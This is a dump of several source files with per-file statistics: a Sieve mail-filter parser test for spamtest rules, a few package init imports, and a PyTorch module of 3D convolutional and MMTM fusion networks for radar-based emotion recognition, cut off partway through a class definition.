| 40.089305 | 228 | 0.795243 | 9,756 | 74,967 | 5.693214 | 0.015683 | 0.082783 | 0.090705 | 0.102983 | 0.964298 | 0.960265 | 0.953243 | 0.946294 | 0.936392 | 0.927606 | 0 | 0.014943 | 0.142116 | 74,967 | 1,869 | 229 | 40.110754 | 0.848693 | 0.540838 | 0 | 0.600551 | 0 | 0 | 0.05231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.311295 | false | 0 | 0.07989 | 0 | 0.702479 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
04e8a1e973347edf0d16d7900baa2756e6de01bf | 46 | py | Python | gravelamps/__init__.py | mick-wright/Gravelamps | 2bb1f79603f95314714ff686505a5406d74fc7d2 | [
"MIT"
] | null | null | null | gravelamps/__init__.py | mick-wright/Gravelamps | 2bb1f79603f95314714ff686505a5406d74fc7d2 | [
"MIT"
] | null | null | null | gravelamps/__init__.py | mick-wright/Gravelamps | 2bb1f79603f95314714ff686505a5406d74fc7d2 | [
"MIT"
] | 1 | 2022-03-31T02:44:11.000Z | 2022-03-31T02:44:11.000Z | from . import lensing
from . import inference
| 15.333333 | 23 | 0.782609 | 6 | 46 | 6 | 0.666667 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 46 | 2 | 24 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
b6b874166cf6690ffa98d4cc2e3785bd0ff4cce0 | 2,157 | py | Python | test/5235/spamtest_test.py | dburkart/check-sieve | 667f0e9670e8820e37a8162ec09e794e6e4f1cb4 | [
"MIT"
] | 20 | 2015-09-06T04:16:04.000Z | 2022-03-24T16:34:56.000Z | test/5235/spamtest_test.py | dburkart/mail-sieve-verifier | cb51fda06c933dd1e1d0ded05ccba9bedbe67e7f | [
"MIT"
] | 24 | 2015-06-14T01:44:30.000Z | 2015-09-05T17:25:11.000Z | test/5235/spamtest_test.py | dburkart/mail-sieve-verifier | cb51fda06c933dd1e1d0ded05ccba9bedbe67e7f | [
"MIT"
] | 3 | 2015-09-08T05:24:08.000Z | 2019-04-01T00:15:29.000Z | import unittest
import checksieve
class TestSpamtest(unittest.TestCase):
def test_without_percent(self):
sieve = '''
require ["spamtest", "fileinto", "relational", "comparator-
i;ascii-numeric"];
if spamtest :value "eq" :comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.unclassified";
}
elsif spamtest :value "ge" :comparator "i;ascii-numeric" "3"
{
fileinto "INBOX.spam-trap";
}
'''
self.assertFalse(checksieve.parse_string(sieve, False))
def test_with_percent(self):
sieve = '''
require ["spamtestplus", "fileinto", "relational",
"comparator-i;ascii-numeric"];
if spamtest :value "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.unclassified";
}
elsif spamtest :percent :value "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.not-spam";
}
elsif spamtest :percent :value "lt"
:comparator "i;ascii-numeric" "37"
{
fileinto "INBOX.spam-trap";
}
else
{
discard;
}
'''
self.assertFalse(checksieve.parse_string(sieve, False))
def test_with_count(self):
sieve = '''
require ["spamtestplus", "fileinto", "relational",
"comparator-i;ascii-numeric"];
if spamtest :percent :count "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.unclassified";
}
elsif spamtest :percent :value "eq"
:comparator "i;ascii-numeric" "0"
{
fileinto "INBOX.not-spam";
}
elsif spamtest :percent :value "lt"
:comparator "i;ascii-numeric" "37"
{
fileinto "INBOX.spam-trap";
}
else
{
discard;
}
'''
self.assertFalse(checksieve.parse_string(sieve, False))
if __name__ == '__main__':
unittest.main() | 28.381579 | 68 | 0.499768 | 186 | 2,157 | 5.704301 | 0.241935 | 0.114043 | 0.165881 | 0.238454 | 0.805844 | 0.805844 | 0.805844 | 0.805844 | 0.805844 | 0.805844 | 0 | 0.007485 | 0.380621 | 2,157 | 76 | 69 | 28.381579 | 0.786677 | 0 | 0 | 0.507246 | 0 | 0 | 0.776182 | 0.056997 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.043478 | false | 0 | 0.028986 | 0 | 0.086957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
b6f77d26893c269b44d8f8e2ad3a076a65c319a5 | 195 | py | Python | htmlmth/evasions/__init__.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | htmlmth/evasions/__init__.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | htmlmth/evasions/__init__.py | ZwCreatePhoton/htmlmth | 74d23ca2fa53e11b2587251d2f71c8f275548182 | [
"MIT"
] | null | null | null | from htmlmth.utils import TransformFunction, http_payload_to_tfarg_function, normalized_headers_to_tfarg_function, string_to_tfarg_function, mime_type_based_transform, replace_apply_replace_back
| 97.5 | 194 | 0.923077 | 27 | 195 | 6.037037 | 0.740741 | 0.128834 | 0.276074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046154 | 195 | 1 | 195 | 195 | 0.876344 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8e0c9459ef7a85a401f40cbca7ee33e8542709d5 | 38,015 | py | Python | FER/em_network/models/c3d.py | Zber5/OpenRadar | 701cf166203c3f3e1ba4873cd132a7ccba4f0863 | [
"Apache-2.0"
] | 1 | 2021-07-09T18:40:24.000Z | 2021-07-09T18:40:24.000Z | FER/em_network/models/c3d.py | Zber5/OpenRadar | 701cf166203c3f3e1ba4873cd132a7ccba4f0863 | [
"Apache-2.0"
] | null | null | null | FER/em_network/models/c3d.py | Zber5/OpenRadar | 701cf166203c3f3e1ba4873cd132a7ccba4f0863 | [
"Apache-2.0"
] | 1 | 2021-11-13T05:33:50.000Z | 2021-11-13T05:33:50.000Z | """
This is the c3d implementation with batch norm.
References
----------
[1] Tran, Du, et al. "Learning spatiotemporal features with 3d convolutional networks."
Proceedings of the IEEE international conference on computer vision. 2015.
"""
"""
1.C3D with one directional heatmap -> C3D
2.C3D with two directional heatmaps -> C3DFusionBaseline
3.C3D with two directional heatmaps fusion -> C3DFusionV2
4.C3D with multimodal phase attention -> ATT_PHASE
5.MMTM add to C3D multimodal fusion + phase attention
https://github.com/haamoon/mmtm/blob/master/mmtm.py
"""
import math
import torch
import torch.nn as nn
from torchsummary import summary
import torch.nn.init as init
import torch.nn.functional as F
from torch.autograd import Variable
from functools import partial
from FER.em_network.models.Conv2D import PhaseNet
class TimeDistributed(nn.Module):
def __init__(self, module):
super(TimeDistributed, self).__init__()
self.module = module
def forward(self, x):
if len(x.size()) <= 2:
return self.module(x)
n, t = x.size(0), x.size(1)
# merge batch and seq dimensions
x_reshape = x.contiguous().view(n * t, x.size(2), x.size(3), x.size(4))
y = self.module(x_reshape)
# We have to reshape Y
y = y.contiguous().view(n, t, y.size(1), y.size(2), y.size(3))
return y
class TimeDistributedTwin(nn.Module):
def __init__(self, module):
super(TimeDistributedTwin, self).__init__()
self.module = module
def forward(self, x, z):
if len(x.size()) <= 2:
return self.module(x)
xn, xt = x.size(0), x.size(1)
zn, zt = z.size(0), z.size(1)
# merge batch and seq dimensions
x_reshape = x.contiguous().view(xn * xt, x.size(2), x.size(3), x.size(4))
z_reshape = z.contiguous().view(zn * zt, z.size(2), z.size(3), z.size(4))
y, v = self.module(x_reshape, z_reshape)
# We have to reshape Y
y = y.contiguous().view(xn, xt, y.size(1), y.size(2), y.size(3))
v = v.contiguous().view(zn, zt, v.size(1), v.size(2), v.size(3))
return y, v
def init_weights(m):
print(m)
if type(m) == nn.Linear:
print(m.weight)
else:
print('error')
class MMTM(nn.Module):
def __init__(self, dim_visual, dim_skeleton, ratio):
super(MMTM, self).__init__()
dim = dim_visual + dim_skeleton
dim_out = int(2 * dim / ratio)
self.fc_squeeze = nn.Linear(dim, dim_out)
self.fc_visual = nn.Linear(dim_out, dim_visual)
self.fc_skeleton = nn.Linear(dim_out, dim_skeleton)
self.relu = nn.ReLU()
self.sigmoid = nn.Sigmoid()
# initialize
# with torch.no_grad():
# self.fc_squeeze.apply(init_weights)
# self.fc_visual.apply(init_weights)
# self.fc_skeleton.apply(init_weights)
def forward(self, visual, skeleton):
squeeze_array = []
for tensor in [visual, skeleton]:
tview = tensor.view(tensor.shape[:2] + (-1,))
squeeze_array.append(torch.mean(tview, dim=-1))
squeeze = torch.cat(squeeze_array, 1)
excitation = self.fc_squeeze(squeeze)
excitation = self.relu(excitation)
vis_out = self.fc_visual(excitation)
sk_out = self.fc_skeleton(excitation)
vis_out = self.sigmoid(vis_out)
sk_out = self.sigmoid(sk_out)
dim_diff = len(visual.shape) - len(vis_out.shape)
vis_out = vis_out.view(vis_out.shape + (1,) * dim_diff)
dim_diff = len(skeleton.shape) - len(sk_out.shape)
sk_out = sk_out.view(sk_out.shape + (1,) * dim_diff)
return visual * vis_out, skeleton * sk_out
class C3D(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3D, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
# self.group4 = nn.Sequential(
# nn.Conv3d(64, 256, kernel_size=(3, 7, 3), padding=1),
# nn.BatchNorm3d(256),
# nn.ReLU(),
# nn.Conv3d(256, 256, kernel_size=(3, 7, 3), padding=1),
# nn.BatchNorm3d(256),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
last_duration = int(math.floor(sample_duration / 8))
# last_size = int(math.ceil(sample_size / 32))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((64 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
# out = self.group5(out)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class SubNet(nn.Module):
def __init__(self):
super(SubNet, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
class SubNet_v4(nn.Module):
def __init__(self):
super(SubNet_v4, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 128, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 128, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 1), padding=(0, 0, 0)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
# (91, 50)
class SubNet_v2(nn.Module):
def __init__(self):
super(SubNet_v2, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 7), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
class SubNet_v3(nn.Module):
def __init__(self):
super(SubNet_v3, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 2, 1)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 2, 1)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 1, 1)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 5, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(3, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
return out
class C3DFusionBaseline(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaseline, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DFusionBaseline_small(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaseline_small, self).__init__()
self.net_azimuth = SubNet_v4()
self.net_elevation = SubNet_v4()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 1
self.fc1 = nn.Sequential(
nn.Linear((128 * 2 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DFusionBaselineFull(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaselineFull, self).__init__()
self.net_azimuth = SubNet_v2()
self.net_elevation = SubNet_v2()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DFusionBaseline_out(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionBaseline_out, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out1 = torch.cat((out_azi, out_ele), dim=1)
out = out1.view(out1.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out1, out
class C3DMMTM_v1(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DMMTM_v1, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
self.mmtm = TimeDistributedTwin(MMTM(64, 64, 4))
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# MMTM fusion
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DMMTM_v2(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DMMTM_v2, self).__init__()
self.azi_group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.azi_group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.azi_group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.azi_group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
self.ele_group1 = nn.Sequential(
nn.Conv3d(1, 16, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 1)))
self.ele_group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 1)))
self.ele_group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 1, 2)))
self.ele_group4 = nn.Sequential(
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 7, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 0)))
self.mmtm1 = TimeDistributedTwin(MMTM(16, 16, 4))
self.mmtm2 = TimeDistributedTwin(MMTM(32, 32, 4))
self.mmtm3 = TimeDistributedTwin(MMTM(64, 64, 4))
self.mmtm4 = TimeDistributedTwin(MMTM(64, 64, 4))
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
# group 1
out_azi = self.azi_group1(azi)
out_ele = self.ele_group1(ele)
# MMTM fusion1
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm1(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# group 2
out_azi = self.azi_group2(out_azi)
out_ele = self.ele_group2(out_ele)
# MMTM fusion2
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm2(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# group 3
out_azi = self.azi_group3(out_azi)
out_ele = self.ele_group3(out_ele)
# MMTM fusion3
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm3(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# group 4
out_azi = self.azi_group4(out_azi)
out_ele = self.ele_group4(out_ele)
# MMTM fusion3
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
out_azi, out_ele = self.mmtm4(out_azi, out_ele)
out_azi = out_azi.permute(0, 2, 1, 3, 4)
out_ele = out_ele.permute(0, 2, 1, 3, 4)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
# still the old version
class C3DAttention(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DAttention, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3DFusionV2(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(C3DFusionV2, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc_azi = nn.Sequential(
nn.Linear((64 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Sigmoid(),
)
self.fc_ele = nn.Sequential(
nn.Linear((64 * last_duration * last_size_h * last_size_w), 1024),
nn.ReLU(),
nn.Sigmoid())
self.fc1 = nn.Sequential(
nn.Linear(1024 * 2, 1024),
nn.ReLU())
self.fc2 = nn.Sequential(
nn.Linear(1024, 256),
nn.ReLU())
self.fc = nn.Sequential(
nn.Linear(256, num_classes))
def forward(self, azi, ele):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
# azi
out_azi = out_azi.view(out_azi.size(0), -1)
out_azi = self.fc_azi(out_azi)
# ele
out_ele = out_ele.view(out_ele.size(0), -1)
out_ele = self.fc_ele(out_ele)
# concatenation
out = torch.cat((out_azi, out_ele), dim=1)
# out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class ATT_PHASE(nn.Module):
def __init__(self):
super(ATT_PHASE, self).__init__()
self.conv1 = TimeDistributed(nn.Sequential(
nn.Conv2d(1, 4, kernel_size=(5, 3), stride=(1, 1), padding=1),
nn.BatchNorm2d(4),
nn.ReLU()))
